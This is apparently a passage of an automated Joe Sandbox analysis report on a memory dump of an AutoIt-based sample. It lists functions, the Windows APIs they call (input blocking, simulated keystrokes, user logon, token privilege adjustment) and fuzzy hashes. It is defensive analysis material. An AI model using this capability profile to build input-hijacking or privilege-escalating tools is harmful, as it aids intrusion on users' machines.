                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InputSendkeybd_event
                                                                                                          • String ID:
                                                                                                          • API String ID: 3536248340-0
                                                                                                          • Opcode ID: 9b698cbdff31dbb80ea15b8e535f61aaa34aac7cd2bf47ab4a814896fcaf0643
                                                                                                          • Instruction ID: 12763716158be51ac3d81fa4964507edb99926e8c2e5f0a8151923c9af9b20aa
                                                                                                          • Opcode Fuzzy Hash: 9b698cbdff31dbb80ea15b8e535f61aaa34aac7cd2bf47ab4a814896fcaf0643
                                                                                                          • Instruction Fuzzy Hash: F5F0377190020DAFDB10CF95D805BFE7BB4EF08315F00804AFD55AA292D3799615DFA4
                                                                                                          Function 00EAA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00EB9B52,?,00ED098C,?), ref: 00EAA6DA
                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00EB9B52,?,00ED098C,?), ref: 00EAA6EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                          • String ID:
                                                                                                          • API String ID: 3479602957-0
                                                                                                          • Opcode ID: 1ace06d44d89eca09a955057495d050a7e613639d43a651377c99f868627bf7e
                                                                                                          • Instruction ID: ae2f7035fe7acbc6057199af5e8a368191a263d6e1729a3ac2b5140eff06fa0e
                                                                                                          • Opcode Fuzzy Hash: 1ace06d44d89eca09a955057495d050a7e613639d43a651377c99f868627bf7e
                                                                                                          • Instruction Fuzzy Hash: ECF0823550532DBFDB21AFA4DC48FEA77ACEF09761F048166B908A6191D6309944CFA1
                                                                                                          Function 00E98DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E98F27), ref: 00E98DFE
                                                                                                          • CloseHandle.KERNEL32(?,?,00E98F27), ref: 00E98E10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 81990902-0
                                                                                                          • Opcode ID: 27ae3331a5eac02e124e7524b04734e763e3aeeefcb87bb3e13357b93504aa87
                                                                                                          • Instruction ID: dafeb4e420a7a09f1b9286e1690d99c21dffede0a1e3036898b32e59de7dd0d5
                                                                                                          • Opcode Fuzzy Hash: 27ae3331a5eac02e124e7524b04734e763e3aeeefcb87bb3e13357b93504aa87
                                                                                                          • Instruction Fuzzy Hash: E9E04672000600EFEB622B21FD08E777BEDEB00350B18882AF49AA0470CB22AC90DB10
                                                                                                          Function 00E6A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E68F87,?,?,?,00000001), ref: 00E6A38A
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E6A393
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: 25fe05ef13dc1addc0e43d8487d203c6ddd2f8eaed28a8bb9dee241b7ebac36f
                                                                                                          • Instruction ID: 0af2480821e3b0659977f007c339c58c14393c3857b74b855d817ce0aaa09f46
                                                                                                          • Opcode Fuzzy Hash: 25fe05ef13dc1addc0e43d8487d203c6ddd2f8eaed28a8bb9dee241b7ebac36f
                                                                                                          • Instruction Fuzzy Hash: 4AB09231065208AFCA402B96FC09B883F68EB44A62F044012F60D54060CB6254548A91
                                                                                                          Function 00EB45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • BlockInput.USER32(00000001), ref: 00EB45F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlockInput
                                                                                                          • String ID:
                                                                                                          • API String ID: 3456056419-0
                                                                                                          • Opcode ID: 17c922974d7183e996a46507dab6c7a25e5e3add01882dbd4b63f0d84f65640a
                                                                                                          • Instruction ID: b4d9f28d31bd268a2b98b75ed009801a691d6b7f153e56b4afbebad038751542
                                                                                                          • Opcode Fuzzy Hash: 17c922974d7183e996a46507dab6c7a25e5e3add01882dbd4b63f0d84f65640a
                                                                                                          • Instruction Fuzzy Hash: 18E0DF76200205AFC310AF5AF800E8BF7E8EF94760F008416FC49E7392DA70EC408BA0
                                                                                                          Function 00EA51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00EA5205
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: mouse_event
                                                                                                          • String ID:
                                                                                                          • API String ID: 2434400541-0
                                                                                                          • Opcode ID: f56f240862ed824b192ad7b68fc986279ce017f5ed1aea4d35a5b0a11db6660d
                                                                                                          • Instruction ID: b5b96925accce21e1a2301a7434aea613827bbecfc45456916cfa7f20a74f3b8
                                                                                                          • Opcode Fuzzy Hash: f56f240862ed824b192ad7b68fc986279ce017f5ed1aea4d35a5b0a11db6660d
                                                                                                          • Instruction Fuzzy Hash: 49D05E97162E0938EC180324AE0FF7602C8E32B7C4F84694B7002BD0C1FCD0784D9431
                                                                                                          Function 00E99369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E98FA7), ref: 00E99389
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LogonUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1244722697-0
                                                                                                          • Opcode ID: d22965a3795ab6e3b1f404270be9de57079767a47dff62b7f9afb33180b9c32f
                                                                                                          • Instruction ID: 0814645ade3557f750d205ed036f91e04c281159ef73343524788ff2f659a0c4
                                                                                                          • Opcode Fuzzy Hash: d22965a3795ab6e3b1f404270be9de57079767a47dff62b7f9afb33180b9c32f
                                                                                                          • Instruction Fuzzy Hash: 82D05E3226050EBFEF018EA4EC05EAE3B69EB04B01F408511FE15D50A0C775D835AB60
                                                                                                          Function 00E80722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E80734
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2645101109-0
                                                                                                          • Opcode ID: 3fc22cc2270f50cd9c025a0518fa14ce593c98f4135fdab6290ebea710e80ba8
                                                                                                          • Instruction ID: 789faefb8c2658d11970c6b1caa5d89a67cd66fc2d9348491b30bbaedbdf9751
                                                                                                          • Opcode Fuzzy Hash: 3fc22cc2270f50cd9c025a0518fa14ce593c98f4135fdab6290ebea710e80ba8
                                                                                                          • Instruction Fuzzy Hash: B1C04CF1801109EBCB05DBA0D988EEE77BCAB04304F140456A109B2100D7749B488B71
                                                                                                          Function 00E6A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E6A35A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: 12b062c2df6ac288ddf397be539dda3c727a3295ed32cad2de4e3b8b438242a0
                                                                                                          • Instruction ID: 6ddc9e711303510712a41c6640915a768f07f15e9032cc7a3ea68cd2f58dc73b
                                                                                                          • Opcode Fuzzy Hash: 12b062c2df6ac288ddf397be539dda3c727a3295ed32cad2de4e3b8b438242a0
                                                                                                          • Instruction Fuzzy Hash: D0A0223002020CFFCF002F8BFC08888BFACEB002A0F008022F80C00032CB33A8208AC0
                                                                                                          Function 00EC3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?,00ED0980), ref: 00EC3C65
                                                                                                          • IsWindowVisible.USER32(?), ref: 00EC3C89
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                          • API String ID: 4105515805-45149045
                                                                                                          • Opcode ID: b078a5cbfe049101b21fa6e654b2d220ae2c1e54c1a779eb32900b07aba05749
                                                                                                          • Instruction ID: 619bb6107f33774d35da3f68df15028ce7519182fdbeb302235e4a3e5ff135d8
                                                                                                          • Opcode Fuzzy Hash: b078a5cbfe049101b21fa6e654b2d220ae2c1e54c1a779eb32900b07aba05749
                                                                                                          • Instruction Fuzzy Hash: 88D162702042159BCB04EF20D655FAAB7E1EF94344F24A55CF9567B2E2CB32ED0ACB52
                                                                                                          Function 00ECABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00ECAC55
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00ECAC86
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00ECAC92
                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00ECACAC
                                                                                                          • SelectObject.GDI32(?,?), ref: 00ECACBB
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00ECACE6
                                                                                                          • GetSysColor.USER32(00000010), ref: 00ECACEE
                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00ECACF5
                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00ECAD04
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00ECAD0B
                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00ECAD56
                                                                                                          • FillRect.USER32(?,?,?), ref: 00ECAD88
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ECADB3
                                                                                                            • Part of subcall function 00ECAF18: GetSysColor.USER32(00000012), ref: 00ECAF51
                                                                                                            • Part of subcall function 00ECAF18: SetTextColor.GDI32(?,?), ref: 00ECAF55
                                                                                                            • Part of subcall function 00ECAF18: GetSysColorBrush.USER32(0000000F), ref: 00ECAF6B
                                                                                                            • Part of subcall function 00ECAF18: GetSysColor.USER32(0000000F), ref: 00ECAF76
                                                                                                            • Part of subcall function 00ECAF18: GetSysColor.USER32(00000011), ref: 00ECAF93
                                                                                                            • Part of subcall function 00ECAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00ECAFA1
                                                                                                            • Part of subcall function 00ECAF18: SelectObject.GDI32(?,00000000), ref: 00ECAFB2
                                                                                                            • Part of subcall function 00ECAF18: SetBkColor.GDI32(?,00000000), ref: 00ECAFBB
                                                                                                            • Part of subcall function 00ECAF18: SelectObject.GDI32(?,?), ref: 00ECAFC8
                                                                                                            • Part of subcall function 00ECAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00ECAFE7
                                                                                                            • Part of subcall function 00ECAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00ECAFFE
                                                                                                            • Part of subcall function 00ECAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00ECB013
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 4124339563-0
                                                                                                          • Opcode ID: a41a17ffd5d045334db3ebbb6bae37de314b29a13bbd5bac987e2df153e32fb0
                                                                                                          • Instruction ID: 0f2f24e82ef35d937114164c058de11baa21f6aac37642d34d90df6298f11d0c
                                                                                                          • Opcode Fuzzy Hash: a41a17ffd5d045334db3ebbb6bae37de314b29a13bbd5bac987e2df153e32fb0
                                                                                                          • Instruction Fuzzy Hash: 24A17F7100A305AFD7119F65ED08F6B7BA9FF48329F181A2EF962A61A0C731D845CF52
                                                                                                          Function 00E42FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?), ref: 00E43072
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00E430B8
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00E430C3
                                                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00E430CE
                                                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00E430D9
                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E7C77C
                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E7C7B5
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E7CBDE
                                                                                                            • Part of subcall function 00E41F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E42412,?,00000000,?,?,?,?,00E41AA7,00000000,?), ref: 00E41F76
                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00E7CC1B
                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E7CC32
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E7CC48
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E7CC53
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 464785882-4108050209
                                                                                                          • Opcode ID: 85e5cf03601c00b64423d8350e79691b9a4299ce6cbd734c584c5b1e3ee506c9
                                                                                                          • Instruction ID: 2abcbd411354083c2774173f08625f9c6d57044e718b4693eb09b62cd2628c6e
                                                                                                          • Opcode Fuzzy Hash: 85e5cf03601c00b64423d8350e79691b9a4299ce6cbd734c584c5b1e3ee506c9
                                                                                                          • Instruction Fuzzy Hash: 8F128E30604201EFDB25CF24D885BA9B7E9FF44304F28A66EF959EB252C731E945CB91
                                                                                                          Function 00E527FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                          • API String ID: 2660009612-1645009161
                                                                                                          • Opcode ID: 5b676b9cff109341d30aa587fc125363f13c100b8cbfb3c6490a8d96c970eef6
                                                                                                          • Instruction ID: baef79a6a4267dbc3646201681f7286374b0ba2bf665797c1378c70abcbf1330
                                                                                                          • Opcode Fuzzy Hash: 5b676b9cff109341d30aa587fc125363f13c100b8cbfb3c6490a8d96c970eef6
                                                                                                          • Instruction Fuzzy Hash: 3BA1D031A40209ABCB14AF60DC42EAE77B4EF95741F14642DFE09BB292EB71DE05D750
                                                                                                          Function 00EB7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 00EB7BC8
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EB7C87
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EB7CC5
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EB7CD7
                                                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EB7D1D
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00EB7D29
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EB7D6D
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB7D7C
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00EB7D8C
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00EB7D90
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EB7DA0
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB7DA9
                                                                                                          • DeleteDC.GDI32(00000000), ref: 00EB7DB2
                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EB7DDE
                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EB7DF5
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EB7E30
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EB7E44
                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EB7E55
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EB7E85
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00EB7E90
                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EB7E9B
                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EB7EA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
